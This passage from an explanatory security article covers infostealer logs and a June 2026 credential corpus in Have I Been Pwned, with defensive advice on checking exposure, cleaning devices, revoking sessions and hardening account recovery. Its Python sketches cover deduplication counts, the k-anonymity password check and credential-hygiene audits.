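The crossover figure is a simple ratio: the share of a sample that already exists in the previously loaded data. The sketch below shows the arithmetic under stated assumptions. The function names and the tiny data set are hypothetical, and the real check runs against HIBP’s own store rather than an in-memory set.

```python
def normalise(addresses):
    """Lower-case and trim addresses, dropping empty entries."""
    return {a.strip().lower() for a in addresses if a.strip()}


def crossover_rate(sample, previously_seen):
    """Fraction of the unique sample addresses that were already known."""
    sample_set = normalise(sample)
    if not sample_set:
        return 0.0
    already_known = sample_set & normalise(previously_seen)
    return len(already_known) / len(sample_set)


if __name__ == "__main__":
    # Ten sample addresses, nine of which appear in the existing data.
    sample = [f"user{i}@example.com" for i in range(10)]
    existing = [f"user{i}@example.com" for i in range(9)]
    print(f"{crossover_rate(sample, existing):.0%} previously seen")
```

Applied to the figures quoted above, a rate of roughly 92% on a sample of around 94,000 addresses means that only about 7,500 of the sampled addresses were new to the service.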

This has direct implications for notification and for how people should react. HIBP has, sensibly, stopped sending fresh alerts for every backfilled or recirculated batch, on the reasoning that there is a threshold beyond which more notifications become noise rather than signal. An email saying “that stealer-log exposure you already knew about now contains slightly more data” helps almost no one. The meaningful signal is the first time an address shows up in stealer logs at all, because that is the evidence of a device infection; subsequent appearances of the same address in later scoops mostly confirm what is already known.

The firehose framing also clarifies why the deduplicated unique counts matter so much more than raw rows. A corpus described as “hundreds of millions of records” or “23 billion rows” sounds apocalyptic, but those are line counts inflated by the merging and re-merging that define the ecosystem. The honest figures are the deduplicated uniques: 56 million addresses, 124 million passwords for the June 2026 set. The raw row count measures how much the data has been copied; the unique count measures how many distinct people and secrets are actually involved. Coverage that leads with row counts is measuring duplication and calling it scale.
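
The gap between raw rows and deduplicated uniques is easy to demonstrate. The sketch below assumes a hypothetical, simplified `email:password` row format; real stealer logs are messier and usually carry a URL as well. It counts the same five rows four different ways.

```python
def summarise(rows):
    """Count raw rows against unique emails, passwords and pairs.

    Assumes each row looks like 'email:password'. The split is on the
    first colon only, because passwords may themselves contain colons.
    """
    emails, passwords, pairs = set(), set(), set()
    total = 0
    for row in rows:
        total += 1
        email, sep, password = row.rstrip("\n").partition(":")
        if not sep:
            continue  # malformed row: counted as a row, contributes no uniques
        email = email.strip().lower()
        emails.add(email)
        passwords.add(password)
        pairs.add((email, password))
    return {
        "rows": total,
        "unique_emails": len(emails),
        "unique_passwords": len(passwords),
        "unique_pairs": len(pairs),
    }


if __name__ == "__main__":
    merged = [
        "a@x.com:pw1",
        "A@x.com:pw1",   # same pair, different casing of the address
        "a@x.com:pw2",
        "b@x.com:pw1",
        "a@x.com:pw1",   # verbatim duplicate from a re-merged dump
    ]
    print(summarise(merged))
```

Five rows here resolve to two addresses, two passwords and three distinct pairs, which is the same collapse, at toy scale, that turns a headline row count into a much smaller unique figure.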

For the individual, the right takeaway from the firehose model is neither panic nor dismissal. It is a recognition that exposure in stealer logs is a state, not an event. If you have been infected once, your credentials are somewhere in the stream, and they will keep resurfacing in new aggregations regardless of any single dataset. That shifts the goal from reacting to each load toward a durable posture: assume your saved credentials may be out there, make them worthless through uniqueness and rotation, harden the device against the next infection, and stop relying on the model of waiting for a breach notification to tell you when to act. The firehose does not stop, so the defence has to be standing rather than reactive.

Recycled mega-breaches and how to read an alarming headline

Every few months, a headline announces that some staggering number of passwords (sixteen billion, twenty-six billion) has leaked, and a wave of secondary coverage treats it as a catastrophe. Almost every time, the reality is more mundane and the framing is wrong. Learning to read these stories correctly is a genuine skill, and the stealer-log ecosystem is the main reason they keep appearing. The June 2026 dataset arrived in exactly this kind of noisy environment, and separating it from the surrounding hype is part of understanding it.

The recurring error is conflating an aggregation with a breach. A breach is a fresh compromise of a specific system. An aggregation is a pile of previously stolen data, scraped together from many old sources and republished as one giant file. The mega-breach headlines almost always describe aggregations. The “16 billion passwords” story of mid-2025 was a compilation of publicly accessible stealer logs, mostly repurposed from older leaks, with only a small portion of genuinely new material; the corpus HIBP eventually loaded from it under the name Data Troll resolved to a much smaller set of unique addresses once the duplication was stripped out. The pattern is consistent: a huge row count, a tiny fraction of novelty, and coverage that reports the row count as if it were a body count.

History rhymes here. The “Collection #1” dump of 2019 was widely called a mega-breach, but careful analysis showed it was a large aggregation built for credential stuffing, with around 2.7 billion rows collapsing to roughly 773 million unique addresses and about 1.16 billion unique pairs once deduplicated. The 2024 compilation dubbed the “mother of all breaches” was reported as 26 billion records but was again a multi-source aggregation, not a single event. In each case, the heterogeneous sources spanned years, the uniqueness was far below the headline, and the recency was overstated. The number that travels is the scariest one, not the most accurate one.

The “Gmail breach” episode of October 2025 shows how this misreading harms real people. Coverage claimed millions of Gmail accounts had been breached, when the underlying reality was that infostealer logs naturally contain Gmail credentials, because Gmail is among the most used services on the planet. Google stated plainly that the alarm stemmed from a misreading of credential-theft database updates rather than any attack on Gmail, and urged users toward two-step verification and passkeys. The credentials were real, but they were harvested from infected users’ devices, not stolen from Google, and framing it as a Gmail breach pointed people at the wrong culprit and the wrong fix.

There is a simple taxonomy that cuts through all of this, and it is worth internalising. The questions to ask of any scary credential headline are: is this a breach of a specific system, or an aggregation of old data; are these unique counts or raw rows; and how much of it is genuinely new versus recirculated. The Synthient datasets that HIBP loaded in late 2025 are a clean illustration of why the distinctions matter, because HIBP deliberately split them: a stealer-log corpus of 183 million unique addresses, and a separate credential-stuffing aggregation of nearly two billion. Reporting that merged the two into one “two-billion mega-breach” got the meaning wrong, because the two have different origins, different evidence value and different implications.

None of this licenses complacency, and that balance is the point. The hype is wrong, and the underlying threat is real. The correct response to an inflated headline is not to dismiss the whole topic but to translate the number into the question that actually matters for you: has my address appeared in stealer logs, do I reuse passwords, and is my device clean. The June 2026 corpus deserves attention precisely on those terms, as a checkable, verified dataset that may contain your credentials, rather than on the terms of whatever larger, vaguer number happens to be trending the same week. Reading these stories well means caring about the right thing and ignoring the inflation wrapped around it.

The personal fallout when your own machine is the leak

For an individual, finding your address in a stealer-log corpus carries a different emotional and practical weight than learning a website you used was breached, and the difference is worth naming. A website breach is something that happened to a company you trusted. A stealer-log appearance is evidence that something ran on your device and copied your secrets. It is closer and more personal, and it implicates the machine you are reading this on rather than a distant server you have no control over. That shift in locus is the reason the right response also has to be more thorough.

The immediate exposure is broad because the harvest was broad. Where a single-service breach exposes your credential for that one service, a stealer log exposes whatever you had saved at the moment of infection across every site, in plaintext, with the URLs attached. The realistic assumption is that every password stored in that browser at that time is compromised, along with any session cookies, autofill data and saved payment details. That is a much wider blast radius than most breach notifications imply, and it is why advice to “change the password on the affected site” badly understates what is needed.

The downstream harms follow from that breadth. The most common is account takeover via credential stuffing, where the stolen pair is tried across email, banking, shopping and social accounts until something works. Email is the highest-stakes target, because control of an inbox enables password resets on nearly everything else; an attacker who gets into your email can often pivot to every account tied to it. Financial fraud, fraudulent purchases, and the hijacking of social or messaging accounts to scam your contacts all flow from the same root. Where session cookies were taken, the attacker may not even need to log in; they can ride your existing sessions until they expire.

There is a phishing aftershock that catches people off guard. Once a dataset surfaces and is publicised, scammers craft messages that reference the breach itself, posing as the affected service or as a security team and using the victim’s real exposed details to seem credible. A breach notification you genuinely received can be followed by a fake one engineered to exploit your alarm, steering you to a counterfeit login page to “secure your account” and harvesting the new credential. The right reflex is to act through known channels, by typing the service’s address yourself, rather than clicking links in any message that arrives in the wake of a breach.

The psychological dimension is real and worth treating honestly rather than dismissing. Discovering that your own device was the source of a leak can produce a sense of violation and a creeping uncertainty about where else your data has flowed and how it is being used. That unease is understandable, but it is most useful when it is channelled into concrete action rather than left as free-floating anxiety. The exposure is a known quantity with a known response, and working through that response methodically is both the practical fix and the antidote to the helpless feeling the news can produce.

There is also a quieter, longer-tail harm in the recirculation already described. Because stealer data is merged and redumped indefinitely, a single past infection can keep generating exposure for years, surfacing your old credentials in new aggregations long after you thought the matter was closed. This is why the durable response is to make the stolen credentials permanently worthless rather than to treat each new dataset as a separate fire to put out. A password that was unique and has been changed, on an account now protected by a phishing-resistant second factor, is inert no matter how many times it resurfaces. The fallout from being in a stealer log is real, but it is bounded by the actions you take, and later sections lay out exactly what those actions are.

Sector by sector, the exposure looks different

A stealer log does not respect industry boundaries, but the consequences of the credentials it contains vary enormously depending on which sector each account belongs to. Looking at the exposure sector by sector clarifies why a single corpus like the June 2026 set can produce wildly different kinds of damage for different victims, and why the defensive priorities differ accordingly.

Financial services sit at the sharp end. A banking or brokerage credential in a stealer log is a direct route to money, and where the log also carries a live session cookie, an attacker may slip past a second factor entirely. The sector has responded faster than most, layering behavioural analytics, device fingerprinting and step-up authentication onto logins, and moving toward phishing-resistant methods, partly under regulatory pressure such as Europe’s strong-customer-authentication requirements. Even so, credential stuffing and account takeover remain persistent threats, and the immediate harm potential is among the highest of any sector. For a victim, a financial credential is the one to rotate first and to protect with the strongest available second factor.

Healthcare carries a different but severe profile. Health systems hold deeply sensitive records and run sprawling, often under-resourced IT estates, which makes them frequent ransomware targets, and stealer-harvested credentials are a common entry point. A clinician’s saved login, taken from a personal device used for work, can open a path into a hospital network where the consequences extend beyond data theft to disrupted care. The combination of high-value data, life-safety stakes and uneven security maturity makes healthcare one of the sectors where an infostealer infection on a single staff device can cascade into a genuine operational crisis.

Retail and e-commerce face high-volume, lower-individual-value exposure that adds up. Stolen shopping credentials enable fraudulent purchases, loyalty-point theft and the draining of stored value, and the sheer number of accounts makes the sector a favourite for credential stuffing. The friction problem is acute here: retailers want frictionless checkout, but frictionless logins are exactly what stolen credentials exploit. The tension between conversion and security is more visible in retail than almost anywhere, and it is why the sector has been an early mover on passkeys, which promise both lower friction and stronger protection at once.

Software-as-a-service and cloud platforms are where credential theft has its widest blast radius for organisations. A single stolen credential for an identity provider or a productivity suite can unlock a whole organisation’s data and serve as a launch point for lateral movement. The Snowflake-related intrusions of 2024 showed how stolen credentials, used against accounts without enforced MFA, could compromise multiple large customers through one cloud provider. In SaaS, the credential is rarely the final target; it is the doorway to everything behind it, which is why the sector’s defensive emphasis has shifted toward phishing-resistant authentication, conditional access based on device posture, and the ability to revoke sessions fast.

The public sector and education combine large user populations, constrained budgets and high-value data, a mix that makes them recurring victims. Government credentials in stealer logs are serious enough that HIBP runs a free service letting national response teams monitor their official domains, with dozens of governments onboarded. Educational institutions, with transient users and decentralised IT, are frequent targets of extortion campaigns, and student or staff credentials harvested from personal devices feed those attacks.

The cross-sector lesson is that the same stolen credential means different things depending on where it works, but the upstream cause is identical: a credential saved on an infected device, often a personal one used for work. That shared root is why the defences converge even as the stakes differ. Unique credentials, phishing-resistant authentication, monitoring for exposed credentials, and the ability to revoke access quickly matter in every sector. What changes is the urgency and the order of priority, set by how much damage a working credential can do once it is in the wrong hands.

Developers, executives and the accounts worth the most

Not every credential in a stealer log is equal, and the market knows it. Some victims carry, on their infected devices, the kind of access that turns a routine harvest into a high-value prize. Developers and senior staff sit at the top of that list, and the contents of a modern stealer log are tailored to extract exactly what makes them valuable.

Developers are a category attackers actively prize, because of what tends to live on a developer’s machine. Beyond ordinary passwords, a stealer log from a developer’s device can carry SSH keys, cloud-provider tokens, API keys, and credentials for code repositories and deployment systems. Those artefacts are far more dangerous than a consumer password, because they often grant programmatic access to production infrastructure, customer data or software supply chains. The breadth of what stealers now grab, including VPN configurations, SSH keys and cloud tokens in a typical log, means a single developer infection can hand an attacker the keys to systems that thousands or millions of people depend on.

The hardcoded-secret problem compounds this. Separate research on secrets sprawl found tens of millions of new hardcoded credentials added to public code commits in a single year, a sharp rise driven partly by AI-assisted development, with leaked secrets tied to AI services growing fast and internal repositories far more likely than public ones to contain embedded secrets. A developer’s device is a concentration point for these high-privilege credentials, and when a stealer harvests it, the exposure reaches well beyond the individual into the systems they build and maintain. Cloud credentials, in particular, can be abused within seconds of being harvested, faster than monitoring systems sometimes deliver their first alert.

Executives and senior staff are valuable for different reasons. Their credentials open access to sensitive strategic information, financial systems and the authority to approve actions, which makes them prime targets for business email compromise and for the lateral movement that precedes ransomware. An executive who saves work credentials in a personal browser, then gets infected through an ordinary lure, can hand an attacker a foothold with unusual reach. Seniority correlates with access, and access is what the attacker is buying, which is why some premium stealers, including the macOS-focused families, are explicitly aimed at the higher-value users that Apple devices tend to attract.

The macOS angle is worth re-emphasising in this context, because it intersects directly with the high-value population. Developers and executives skew toward Macs, and the assumption that macOS is immune to this category is both common and wrong. Active macOS stealer families harvest credentials, keychain contents and session data much as their Windows counterparts do, and at least one was priced as a premium product precisely because of the value of the Apple-using demographic. The platform offers no exemption from credential theft, and the belief that it does leaves some of the highest-value targets among the least defended.

There is a structural point underneath all of this about non-human and machine identities, which are growing faster than human ones. Modern systems run on a sprawling set of service accounts, tokens and keys that authenticate software to software, and these are frequently the credentials a developer’s machine holds. They often lack the protections applied to human logins, such as MFA, and they can persist unrotated for long periods. A stolen machine credential can be both more powerful and longer-lived than a stolen human password, and stealer logs are increasingly a source of them. The defensive response is the same logic applied to a different identity type: rotate aggressively, scope access tightly, prefer short-lived credentials over long-lived secrets, and never embed secrets where a process running on a developer’s device can read them.
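
The rotation advice can be expressed as a periodic audit over an inventory of machine credentials. The sketch below is illustrative only. The `MachineCredential` record, the credential names and the 90-day threshold are all assumptions made for the example, not values taken from any standard or from the source data.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional


@dataclass(frozen=True)
class MachineCredential:
    """Hypothetical inventory record for a service key or token."""
    name: str
    issued_at: datetime
    expires_at: Optional[datetime]  # None means the secret never expires


def needs_rotation(cred, now, max_age=timedelta(days=90)):
    """Flag secrets that never expire or are older than max_age.

    The 90-day default is an assumed policy value for illustration.
    """
    if cred.expires_at is None:
        return True
    return now - cred.issued_at > max_age


def audit(inventory, now):
    """Return the names of credentials that should be rotated."""
    return [c.name for c in inventory if needs_rotation(c, now)]


if __name__ == "__main__":
    utc = timezone.utc
    now = datetime(2026, 6, 15, 12, 0, tzinfo=utc)
    inventory = [
        MachineCredential("ci-deploy-key", datetime(2025, 1, 10, tzinfo=utc), None),
        MachineCredential("short-lived-token", now - timedelta(hours=1),
                          now + timedelta(hours=1)),
    ]
    print(audit(inventory, now))
```

Passing `now` in explicitly keeps the check deterministic, and treating a missing expiry as an automatic flag reflects the preference for short-lived credentials over long-lived secrets.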

For the high-value individual, the practical implication is that the stakes of a single infection are higher and the remediation is more involved. It is not enough to change a few passwords. Keys must be rotated, tokens revoked, repositories audited, and cloud access reviewed, because the artefacts a stealer takes from a developer or executive can keep working long after the obvious passwords are changed. The June 2026 corpus, like every stealer load, contains a tail of these high-privilege credentials mixed in with the ordinary ones, and that tail is where the most serious organisational damage tends to originate.

Regulatory weight in Europe and the shift in password standards

Stealer logs sit awkwardly within a regulatory framework built mostly around breaches of organisations, and that mismatch shapes how the law applies to the June 2026 corpus. Under Europe’s General Data Protection Regulation, the obligations to secure personal data and to notify regulators and affected people fall on the organisation that controls the data. When a company is breached, the lines of responsibility are clear. When credentials are stolen from individuals’ own infected devices, there is no breached controller to hold accountable for that specific theft, which leaves a genuine gap between how the harm occurs and how the rules are written.

That gap does not leave organisations off the hook downstream, though, and this is where the regulatory weight reattaches. If a company suffers a breach because an attacker logged in with credentials harvested by an infostealer, the company can still bear responsibility for the resulting compromise of its systems and the personal data within them. Regulators have made clear that weak authentication and a failure to defend against credential-based attacks can constitute inadequate security. An organisation cannot prevent its users from being infected, but it can be expected to assume some are, and to build access controls that contain the damage, which is precisely the posture the threat data recommends. A breach enabled by a stolen-but-foreseeable credential, against a service that relied on the password alone, is a harder position to defend before a regulator than one protected by phishing-resistant authentication.

The directional pressure in Europe is toward stronger authentication, not merely better breach response. The payment-services framework’s strong-customer-authentication requirements already push financial services toward multi-factor and phishing-resistant methods, and the successor framework agreed in 2025 extends that trajectory into implementation over the following years. Network-and-information-security rules raise the baseline expectations for a widening set of organisations. The regulatory current runs steadily toward eliminating reliance on shared secrets, which aligns with the technical direction the rest of this analysis describes.

The standards picture reinforces this and is arguably more consequential than any single regulation, because standards shape what “reasonable security” means in practice. In 2025, the United States National Institute of Standards and Technology finalised the latest version of its digital-identity guidance, and the changes mattered. Multi-factor authentication at the standard assurance level must now offer a phishing-resistant option, stated as a requirement rather than a suggestion, with the highest assurance level demanding authenticators whose private keys cannot be exported. Synced passkeys were recognised as qualifying at the standard assurance level. The same body’s long-standing advice to screen new passwords against lists of known-compromised values, the advice Pwned Passwords operationalises, remains in force.

The deprecation of weak factors is part of the same shift, and it is moving fast. Through 2025, momentum built against SMS-based one-time codes, which are vulnerable to interception and social engineering, with security agencies warning against their use for authentication and various institutions discontinuing them. The clear regulatory and standards message is to move away from passwords-plus-SMS toward phishing-resistant methods, and that message is now backed by deadlines and requirements rather than aspiration.

For organisations reading the June 2026 dataset as a risk signal, the regulatory and standards environment converts good practice into something closer to obligation. Screening passwords against compromised lists, enforcing phishing-resistant authentication, and being able to respond quickly when credentials are exposed are increasingly the expected baseline against which security is judged. The credentials in stealer logs are foreseeable, and foreseeable risks are the ones regulators expect organisations to have planned for. The dataset is not just a security prompt; it is a reminder that the legal and standards-based definition of adequate authentication is tightening, and that reliance on passwords alone is steadily becoming indefensible.

Checking your own exposure the right way

Acting on a dataset like the June 2026 corpus starts with finding out whether it concerns you, and there is a right way to do that which avoids the traps scammers set around these events. The primary tool is Have I Been Pwned itself. Going to the site directly and entering your email address tells you whether it appears in the breaches and corpora HIBP has loaded, including the stealer-log datasets. Type the address into the site yourself rather than clicking a link in any email claiming to check it for you, because messages promising to test your exposure are a known phishing pattern, especially in the days after a breach is publicised.

The address check is the first step, but for stealer logs the more useful information is which sites your credentials were captured against. HIBP’s stealer-log features let a verified user, through the notification service, see the specific domains their address appeared next to in the logs, which turns a vague alert into an actionable list of accounts to secure. If you can see that your address showed up against particular services, those are the credentials to rotate first, because the attacker knows exactly where they work. Signing up for HIBP’s free notifications also means you are told automatically if your address surfaces in future loads, which matters given the firehose nature of the data.

The password side is checked differently and deserves its own pass. Pwned Passwords lets you check whether a specific password has appeared in known compromises, using the k-anonymity method that never sends your full password or its complete hash to the server. Most reputable password managers now run this check across an entire vault automatically, flagging every stored password that appears in the corpus, which is far more practical than checking passwords one by one. A password that appears in Pwned Passwords should be treated as compromised regardless of how strong it looks, and replaced, because its presence means it is in the lists attackers feed into automated attacks.
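
The k-anonymity check works by hashing the password locally with SHA-1, sending only the first five hexadecimal characters of the hash to the Pwned Passwords range endpoint, and comparing the returned suffixes on the client. The sketch below is one minimal way to do that with the Python standard library. The function names and the User-Agent string are hypothetical, and the lookup is passed in as a parameter so the parsing logic can be exercised without a network call.

```python
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def split_hash(password):
    """Return (first 5 hex chars, remaining 35) of the SHA-1 hash."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix):
    """Ask the range endpoint for every hash suffix under this prefix."""
    request = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"User-Agent": "pwned-check-sketch"},  # hypothetical name
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.read().decode("utf-8")


def pwned_count(password, range_lookup=fetch_range):
    """Return how many times the password appears, or 0 if absent.

    Only the 5-character prefix is handed to range_lookup; the suffix
    comparison happens locally against 'SUFFIX:COUNT' response lines.
    """
    prefix, suffix = split_hash(password)
    for line in range_lookup(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count)
    return 0


if __name__ == "__main__":
    prefix, _ = split_hash("password")
    print("Only this prefix would leave the machine:", prefix)
```

Calling `pwned_count("some password")` with the default lookup performs a live request. Any non-zero result means the password should be replaced, however strong it looks.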

A note on what a clean result does and does not mean is essential to using these tools honestly. A negative result on HIBP means your address has not appeared in the data the service has loaded and verified; it does not mean your credentials are safe, because plenty of stolen data never reaches HIBP or sits in private channels. Absence from the database is reassuring but not conclusive. The sensible reading of a clean result is “no known exposure in HIBP’s data,” not “I am secure,” and the preventive habits described later apply regardless of what the check returns.

There are complementary checks worth knowing about. Some security vendors offer broader exposure-monitoring services that scan additional sources, and several browsers and operating systems now include built-in breach alerts that notify you when a saved credential appears in a known compromise. Using more than one source gives a fuller picture, though the same caveat applies to all of them: no single service sees everything, and a quiet result from any one of them is not a guarantee. The goal is a reasonable view of your exposure, not a false sense of certainty.

If a check comes back positive, the order of operations matters, and panic is the enemy of a good response. Start with the highest-stakes accounts and work down: email first, because it controls resets on everything else, then financial accounts, then any work-related logins, then the rest. For each, change to a unique password, enable the strongest available second factor, and where the option exists, sign out of all active sessions to kill any stolen cookies. The next section addresses the part most people skip, which is the device itself, because if the machine is still infected, every new password you set is captured the moment you type it, and the cleanup has to begin there.

Cleaning an infected machine and the limits of a password reset

The instinct after a breach notification is to change passwords, and that instinct is right but incomplete. For a stealer-log exposure specifically, changing passwords without addressing the device can be worse than useless, because if the malware is still running, it simply captures the new credentials as you enter them. The first question after a stealer-log appearance is not “which passwords do I change” but “is the machine that was infected now clean,” and answering it properly reorders the entire response.

In practice, the difficulty is that you often do not know which device was infected or when. Stealer infections leave little trace, run quickly and frequently self-delete, and the exposed data may date from an infection months or years ago on a machine you no longer use. Where you can identify or reasonably suspect a device, the conservative approach is to run a reputable malware scan while understanding its limits: a large share of infections happen on machines that already had security software, and a stealer that has already exfiltrated its haul and removed itself may leave nothing for a scanner to find. For a device you genuinely suspect, the most reliable cleanup is a full reset of the operating system from known-good media, which removes any persistence the malware may have established and gives you a clean base from which to re-establish credentials.

The table below sets out what each common defensive action actually accomplishes against a stealer-log exposure, because the gaps between measures are where people get a false sense of safety.

What each defensive measure stops after a stealer-log exposure

Measure | What it stops | What it does not stop
Changing one reused password | Reuse-based stuffing for that one password | Other reused passwords; active stolen sessions; an active infection
Unique passwords plus a manager | One credential compromising many accounts | Theft of whatever is captured during a fresh infection
App or SMS second factor | Login attempts using only a stolen password | Replay of stolen live session cookies; SMS interception
Passkeys (FIDO2) | Phishing and reuse of a harvestable shared secret | Risks on accounts not yet moved to passkeys
Device-bound sessions (DBSC) | Replay of a stolen cookie on another device | Theft of passwords and other log contents; unsupported sites
Removing the malware | The device continuing to leak new credentials | Exposure of data already exfiltrated before cleanup

Read together, the rows show why no single action is sufficient and why sequence matters: clean the device, then rotate credentials, then revoke sessions, then strengthen authentication. Each measure closes one gap and leaves others open.

The session point bears repeating because it is the one most often missed. Changing a password protects against future logins that rely on that password, but if the infection captured live session cookies, those cookies can remain valid until they expire or you explicitly sign out of all sessions. Wherever a service offers a “sign out everywhere” or “revoke all sessions” option, use it as part of the cleanup, because it is the step that actually invalidates a stolen cookie a new password would not touch.
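A toy model makes the gap between a password change and a session revocation concrete. The sketch below assumes a hypothetical service that stores session tokens independently of the password; real services differ, and some do end sessions when a password changes, so treat the class and its method names as illustrative only.

```python
import secrets


class AccountSessions:
    """Toy in-memory account: one password, many independent session tokens."""

    def __init__(self, password: str) -> None:
        self.password = password
        self.sessions: set[str] = set()

    def log_in(self, password: str) -> str:
        """Check the password once, then hand back a long-lived token (the cookie)."""
        if not secrets.compare_digest(password.encode(), self.password.encode()):
            raise PermissionError("wrong password")
        token = secrets.token_urlsafe(32)
        self.sessions.add(token)
        return token

    def is_valid(self, token: str) -> bool:
        # A session check never consults the password again.
        return token in self.sessions

    def change_password(self, new_password: str) -> None:
        # Affects future log-ins only; tokens already issued stay in the set.
        self.password = new_password

    def revoke_all_sessions(self) -> None:
        # The "sign out everywhere" step: every issued token stops working.
        self.sessions.clear()
```

In this model a token copied before `change_password` still passes `is_valid` afterwards, and only `revoke_all_sessions` invalidates it, which is the behaviour the paragraph above warns about.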

For higher-value users, the cleanup extends well beyond passwords, as the earlier section on developers and executives described. Keys must be rotated, tokens revoked, and any cloud or repository access reviewed, because the high-privilege artefacts a stealer takes keep working independently of the passwords you change. The honest summary is that a stealer-log exposure is not a password problem with a password solution. It is a device-compromise problem, and the password rotation is only the visible final step of a cleanup that has to start with the machine and include the sessions and keys a password reset leaves untouched.

Password habits that survive a stealer infection

The uncomfortable truth running through this entire analysis is that you cannot fully prevent a stealer infection, because it depends on human behaviour at a moment of haste, and everyone has bad moments. The realistic goal is not perfect prevention but limiting the damage when an infection happens, and a small set of habits does that work. These are the practices that make a stolen credential close to worthless and contain a single infection to a single account rather than letting it cascade.

The foundation is a unique password for every service, generated and stored by a password manager. This is one recommendation, not two, because unique passwords are impossible to sustain by memory at the scale of modern life, and the manager is what makes uniqueness practical. With unique passwords, a credential stolen from one site works only on that site, so credential stuffing collapses; there is nothing to reuse. The Verizon finding that the median infected user reused roughly half their passwords is the exact failure this habit removes. A manager also lets you audit your whole vault against Pwned Passwords in one pass and replace anything that has been exposed.
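The reuse problem is easy to see once a vault is laid out as data. The following sketch assumes a hypothetical export shaped as a mapping from site name to password; real password managers have their own export formats and built-in reuse reports, so the function name and data shape here are illustrative.

```python
from collections import defaultdict


def reuse_groups(vault: dict[str, str]) -> list[list[str]]:
    """Return groups of sites that share one password, without echoing the password.

    Every site in a group falls together if any one of them is captured.
    """
    sites_by_password = defaultdict(list)
    for site, password in vault.items():
        sites_by_password[password].append(site)
    return sorted(
        sorted(sites) for sites in sites_by_password.values() if len(sites) > 1
    )
```

An empty result means every entry is unique, so a credential captured for one site opens only that site.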

There is a subtlety about where the manager stores its data that matters specifically for stealer resistance, and it is worth getting right. A dedicated password manager keeps your credentials behind a master secret and does not expose the entire vault to any program running in your user session the way a browser’s built-in password store can. Reserving the browser’s own password memory for low-stakes accounts, and keeping high-stakes logins in a dedicated manager, limits what a stealer can grab in the seconds it runs. It is not a guarantee, since a sophisticated infection can target managers too, but it changes the default exposure from “everything saved in the browser” to a smaller, better-protected set.

The second habit is a strong second factor on every account that offers one, with a clear preference order. Phishing-resistant methods such as passkeys or hardware security keys are the strongest; app-based authenticator codes are good; SMS codes are the weakest and should be a last resort, because they can be intercepted and socially engineered and are being deprecated by standards bodies for exactly that reason. A second factor does not stop cookie theft, as the earlier sections explained, but it does mean a stolen password alone is not enough to log in, which neutralises the most common use of stealer-log credentials.

The third habit is reducing what is exposed in the first place, which comes back to the infection routes. Not running cracked software, not pasting commands you do not understand into system dialogs, treating unexpected update prompts and verification steps with suspicion, and keeping the operating system and browser patched are the unglamorous behaviours that cut the chance of infection. None of them demands technical skill, and all of them require resisting the specific moments of convenience the lures exploit. Keeping software current matters because, while infostealers rely mainly on social delivery, an unpatched system widens the range of ways malware can take hold and persist.

The fourth habit is signing out of sessions you are not using and periodically reviewing active sessions where services expose them, which limits the value of any cookie a stealer might capture. Short-lived sessions and the discipline of explicitly logging out reduce the window in which a stolen cookie is useful. Where a service offers it, enabling device-bound session protection or equivalent features adds a layer that makes stolen cookies useless elsewhere.

The point of framing these as habits rather than as a one-time response is that the threat is continuous. The firehose of stealer data does not stop, and breach notifications are a lagging signal that arrives after the damage is possible. A standing posture of unique passwords, strong second factors, cautious behaviour and session hygiene means an infection, when it comes, is contained by default rather than requiring a frantic reaction. That is the difference between treating each dataset as a separate emergency and building a baseline that makes most datasets a non-event for you personally. The credentials in the June 2026 corpus are dangerous mainly to people who reused them and left them protected by a password alone; for someone with these habits, an appearance in the corpus is a prompt to confirm and move on, not a crisis.

The account-recovery back door behind every stolen password

Most of the defensive advice around stealer logs focuses on the front door, the login itself, but attackers who cannot get through the front door increasingly go around to the back, through account recovery. Recovery flows exist to let a legitimate user back in after they forget a password or lose a device, and that same mechanism is exactly what an attacker exploits when the password alone stops working. A stealer log is unusually well suited to this, because it hands the attacker not just passwords but the raw material recovery systems rely on to verify identity: the victim’s email address, phone number, security-question answers saved in a browser, and often access to the inbox that resets flow through.

Email sits at the centre of the problem and deserves to be treated as the master key it is. Control of an email account is control of nearly every other account tied to it, because almost every service sends its password reset to that inbox. An attacker who recovers or takes over the email account can then work through the reset process on banking, shopping, social and work accounts one by one, each time receiving the reset link in a mailbox they now own. This is why the standard advice to secure the email account first is not a formality; it is the single most valuable step, and an email account protected only by a stealable password is the weakest link in a person’s entire digital life.

The phone number is the next vulnerability, and it is the reason text-message recovery keeps drawing warnings. A stealer log routinely contains the victim’s phone number alongside their credentials, and where an account allows recovery or a second factor by SMS, an attacker can pursue a SIM-swap, persuading or bribing a mobile carrier to move the number to a device they control. Once the number is theirs, every code and reset link sent by text lands on the attacker’s phone, defeating SMS-based protection entirely. The personal details elsewhere in the log, used to answer a carrier’s identity checks, make that social engineering easier, which is one more reason text-message authentication and recovery are being retired in favour of phishing-resistant methods.

Security questions are a quieter weakness that the contents of a log often expose directly. Answers saved in a browser, or guessable from data the same log contains, turn a supposed identity check into a formality the attacker can pass. A recovery question whose answer is sitting in the stolen data, or is discoverable online, protects nothing, and the convenience of these questions has long outlived whatever security value they once carried. Treating them as a second password, rather than as a memory test, is the only safe way to use them where a service still insists on them.

The practical hardening follows from naming the weak points. Securing the email account with a phishing-resistant second factor or a passkey comes first, because it anchors everything downstream. Reviewing each important account’s recovery options, removing SMS fallback where a stronger method exists, replacing security-question answers with random strings kept in a password manager, and generating and safely storing offline backup codes all close the routes an attacker would otherwise take. Strong authentication on the login achieves little if the recovery path beside it still accepts a password, a text message and a guessable answer, and closing that path is the part of credential defence people most often skip. The June 2026 corpus is full of exactly the data these recovery flows trust, which is why the people in it should look as hard at how their accounts can be recovered as at how they are logged into.
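Replacing security-question answers with random strings is simple to automate. This is a minimal sketch using Python's standard `secrets` module; the function names, the 24-character length and the alphanumeric alphabet are assumptions chosen for illustration, and the generated answers only help if they are stored in a password manager rather than in the browser.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits


def random_answer(length: int = 24) -> str:
    """A security-question 'answer' that cannot be guessed or looked up online."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def answers_for(questions: list[str]) -> dict[str, str]:
    """Give each question its own random answer, treating it as a second password."""
    return {question: random_answer() for question in questions}
```

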